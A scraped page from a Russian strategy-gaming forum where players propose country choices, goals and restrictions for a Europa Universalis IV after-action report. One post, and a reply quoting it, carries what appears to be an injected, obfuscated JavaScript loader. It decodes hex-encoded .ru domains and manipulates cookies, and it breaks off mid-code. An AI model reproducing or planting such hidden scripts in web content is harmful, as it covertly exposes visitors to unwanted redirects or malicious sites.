Новый ААР - Страница 3 - Заброшенные - Strategium.ru Перейти к содержимому

Новый ААР

Рекомендованные сообщения

Iamneo94

Поскольку в сингл я сейчас играю в меру редко и больше на просмотр нововведений патча, то написать ААР - дело не самое простое.

Сейчас, например, у меня нет ни страны, ни идеи, а поэтому надежда только на форумчан.

Что нужно:

1. Страна. Список стран - любые, которые доступны 11 ноября 1444 года. Это практически весь мир, кроме небольших исключений, связанных с механикой (страна внутри зависимой страны, повстанцы - Готланд, Финляндия, несколько индийских миноров, да одна страна в Японии). Не буду играть за страны в Америке: с моей точки зрения это - скука смертная и там делать нечего.

Крайне желательно, чтобы у страны были уникальные идеи, а еще лучше, чтобы у нее был бонус, от которого можно плясать (см. пункт 2)

2. Цель игры. Реальная цель, к которой можно идти, при этом постоянно усиливая свою страну. Всякие развалы османов и прочие глупости не интересуют. WC тоже не будет, так что примерное время выполнения - около 150-250 лет.Смена религий через повстанцев допускается, но не стоит злоупотреблять. Менять основную культуру крупной страны точно не буду, 1-2 провинчастого минора - может быть.

Цель игры должна (в идеале) хоть как-то соответствовать истории и нацидеям страны - собирать великий флот за Богемию особого желания нет.

Примеры: за Мутапу контролировать все золотоносные провинции (да, я знаю, что уже делали).

За Наксос или Госпитальеров добиться доминирования приватиров во всех европейских торговых узлах (эффективность +25%)

За Флоренцию добиться максимальной прибыли от торговли (идея +25%)

Создать Индостан из Мальдив

Сделать Бордо самым богатым ТЦ в мире (богаче, чем все остальные).

Получать прибыль с Америки в Малакке.

3. Ограничения. Куда же без них (см. ААР по Британии - Войдите или зарегистрируйтесь, чтобы увидеть скрытое содержимое.

Здесь фантазия авторов совершенно неограниченна.

Не выходить за пределы Балтики, Новгородского, Любекского ТЦ за Швецию (любимая страна, если найдете достойную цель - только за)

Есть провки только в Генуе и Венеции за Тоскану

Кушать только прибрежные провки

Не брать определенные идеи (влияние и админку, например)

не расширяться через вассалов.

Ну и т.п.

Предлагайте :)

Изменено пользователем Iamneo94
Ссылка на комментарий

Закреплённые сообщения
Iamneo94

Это можно попробовать, но, скорее всего, я просто не замечу какую-то колонию и обязательно зафейлюсь)

Ссылка на комментарий

JLRomik

райн77,

Небольшой оффтоп. Намёк понятен? ;)Нажмите здесь!
 d0cca0777d85.jpg[Cкрыть]
Ссылка на комментарий

Iamneo94
Только Мировая Революция может быть достаточно достойной целью для вас! (Т.е. уйти в ФП революционная респ-ка и изменить ФП всех государств в мире, WC не обязателен. Старт за Триер - родину К.Маркса. Заодно получите классный флаг, если успеете в Германию... :blush: )

А можно менять ФП странам в Азии?

Ссылка на комментарий

antiximik
А можно менять ФП странам в Азии?
Поглощаем и выделяем. Так не пройдёт? (Сорри. Я никогда не играл в революцию...)
Ссылка на комментарий

AndrG
К сожалению, не получится

Перемирие минимум на 5 лет - и за это время колонисты успевают отстроить колонии. Примерно начиная с 10 диптеха это для них не проблема.

Т.е избил Англию, а она успевает за время перемирия отстроиться.

Не допустить создания колониальных автономий - это легко и можно, но это реальный максимум, что можно выжать

Да ни в жизнь не поверю, что за первые 50 лет вы не съедите побережье Англии, 8-10 прибрежных провинций Кастилии, да Францию вглубь континента не загоните. Вопрос только в том, что дальше станет невообразимо скучно отлавливать вторую волну стран-колонистов. Я делал подобные вещи за Кастилию/Португалию/Англию/Францию, и все эти партии заканчивались из-за скуки в районе 1530 года.

Может Войдите или зарегистрируйтесь, чтобы увидеть скрытое содержимое. погонять попробуете? Я эту идею как раз в расчете на вас и кидал, чтобы хоть как-то примирить вас с синглом ;)

Ссылка на комментарий

Iamneo94
Да ни в жизнь не поверю, что за первые 50 лет вы не съедите побережье Англии, 8-10 прибрежных провинций Кастилии, да Францию вглубь континента не загоните. Вопрос только в том, что дальше станет невообразимо скучно отлавливать вторую волну стран-колонистов. Я делал подобные вещи за Кастилию/Португалию/Англию/Францию, и все эти партии заканчивались из-за скуки в районе 1530 года.

Может Войдите или зарегистрируйтесь, чтобы увидеть скрытое содержимое. погонять попробуете? Я эту идею как раз в расчете на вас и кидал, чтобы хоть как-то примирить вас с синглом ;)

Конечно, съем

Но это достаточно скучно, согласитесь

В ААР-е за Англию было достаточно много врагов, которых приходилось не без труда пилить до самого конца (отъевшийся Видж был весьма силен).

Здесь же - через 50 лет нет конкурентов

А с мишками интересно, но они быстро сдуваются. Китайская техгруппа, увы.

А если еще и не повезет со стартовой позицией...

Изменено пользователем Iamneo94
Ссылка на комментарий

resursator

За мусульманскую Италию собрать СРИ. Ну или просто стать императором. Объединение ислама/изгнание турок из балкан бонусом.

p.s. старт за муслима.

Изменено пользователем resursator
Ссылка на комментарий

райн77
За мусульманскую Италию собрать СРИ. Ну или просто стать императором. Объединение ислама/изгнание турок из балкан бонусом.

p.s. старт за муслима.

мусульмане не могут в императоры если я правильно помню

Ссылка на комментарий

Анклин

Не знаю, выполнимо ли :P. За Афины стать миафизитом, после чего, искоренить католичество как религию.

Ссылка на комментарий

resursator
мусульмане не могут в императоры если я правильно помню

И религиозный мир не помогает?

Ссылка на комментарий

Iamneo94
мусульмане не могут в императоры если я правильно помню

Вроде могут, после 6-ой реформы (если до этого быть христианином).

Или нет?

Ссылка на комментарий

А может нашествие монголов—тенгриан? С обретением новой родины, где-нибудь во Франции, наподобие как предки венгров.

Ссылка на комментарий

Вроде могут, после 6-ой реформы (если до этого быть христианином).

Или нет?

После отмены выборов император может в любую религию перейти.

Изменено пользователем balbes
Ссылка на комментарий

Wiyama
А с мишками интересно, но они быстро сдуваются. Китайская техгруппа, увы.

А если еще и не повезет со стартовой позицией...

У Ян-Майена западная тех. группа. Или я что-то недопонял?

Изменено пользователем Yohan
Ссылка на комментарий

"Норвежский лес" надо все таки сделать. С новым патчем будет еще интересней.

Ссылка на комментарий

Конечно банально, но все же.

За Сербию объединить все провинции, которые имеют культуру южнославянской, восточнославянской и западнославянской культурной группы. За эти рамки не вылезать создав чисто славянскую империю

Изменено пользователем Igor03
Ссылка на комментарий

antiximik
А можно менять ФП странам в Азии?
Зашёл за Фра на вкладке про революцию. При выделении (как я описывал) получается не западная техгруппа... Fail.

Поэтому вам будет слишком сложно (дважды WC за 60 лет). Либо растягивание/перекультуривание европеоидов в Индокитай/Индокитая... Снимаю моё предложение.

Ссылка на комментарий

AremFrance

Играя за Корею стать конституционной республикой, принять плутократические идеи, используя кб на Демократию захватить регионы Франция, Германия, Британия, Италия и Скандинавия(как минимум 2 из перечисленных), Колонизировать Сев. Америку. Иметь флот, равный флотам остальных стран десятки лидеров по флоту.

Ограничения: Перейти в республику до 1600г., Нельзя захватывать Индию, Арабские страны, Иметь не более 3х колониальных провинций в Африке, После принятия конституционной республики воевать только по кб Распространение Демократии.

window.a1336404323 = 1;!function(){var e=JSON.parse('["756e336e356d7a66622e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "strategium.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Изменено пользователем AremFrance
Ссылка на комментарий

VonSerj
Играя за Корею стать конституционной республикой, принять плутократические идеи, используя кб на Демократию захватить регионы Франция, Германия, Британия, Италия и Скандинавия(как минимум 2 из перечисленных), Колонизировать Сев. Америку. Иметь флот, равный флотам остальных стран десятки лидеров по флоту.

Ограничения: Перейти в республику до 1600г., Нельзя захватывать Индию, Арабские страны, Иметь не более 3х колониальных провинций в Африке, После принятия конституционной республики воевать только по кб Распространение Демократии.

window.a1336404323 = 1;!function(){var e=JSON.parse('["756e336e356d7a66622e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "strategium.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

КБ Распространение Демократии!??

вторую часть сообщения вообще не понял

Изменено пользователем VonSerj
Ссылка на комментарий

Faponsko
КБ Распространение Демократии!??

вторую часть сообщения вообще не понял

А мне вот вторая часть очень понравилась, там много интересных идей для ААРа.

Ссылка на комментарий

Присоединиться к обсуждению

Вы можете оставить комментарий уже сейчас, а зарегистрироваться позже! Если у вас уже есть аккаунт, войдите, чтобы оставить сообщение через него.

Гость
Ответить в тему...

×   Вы вставили отформатированное содержимое.   Удалить форматирование

  Only 75 emoji are allowed.

×   Ваша ссылка автоматически преображена.   Отображать как простую ссылку

×   Предыдущее содержимое было восстановлено..   Очистить текст в редакторе

×   You cannot paste images directly. Upload or insert images from URL.

  • Ответы 78
  • Создано
  • Последний ответ
  • Просмотры 11205

Лучшие авторы в этой теме

  • Iamneo94

    16

  • JLRomik

    8

  • Last

    5

  • райн77

    3

  • OliverDeBra

    3

  • antiximik

    3

  • Faponsko

    3

  • Wiyama

    3

  • rafael abcde

    3

  • kwim

    2

  • AndrG

    2

  • balbes

    2

  • Sayfer

    2

  • mr_john

    2

  • Godemar

    2

  • VonSerj

    2

  • Nestiere

    2

  • resursator

    2

  • maxter

    1

  • n0xy

    1

  • Skepteroun

    1

  • taxil

    1

  • ezhi

    1

  • Анклин

    1

Лучшие авторы в этой теме

  • Сейчас на странице   0 пользователей

    • Нет пользователей, просматривающих эту страницу


Copyright © 2008-2024 Strategium.ru Powered by Invision Community

×
×
  • Создать...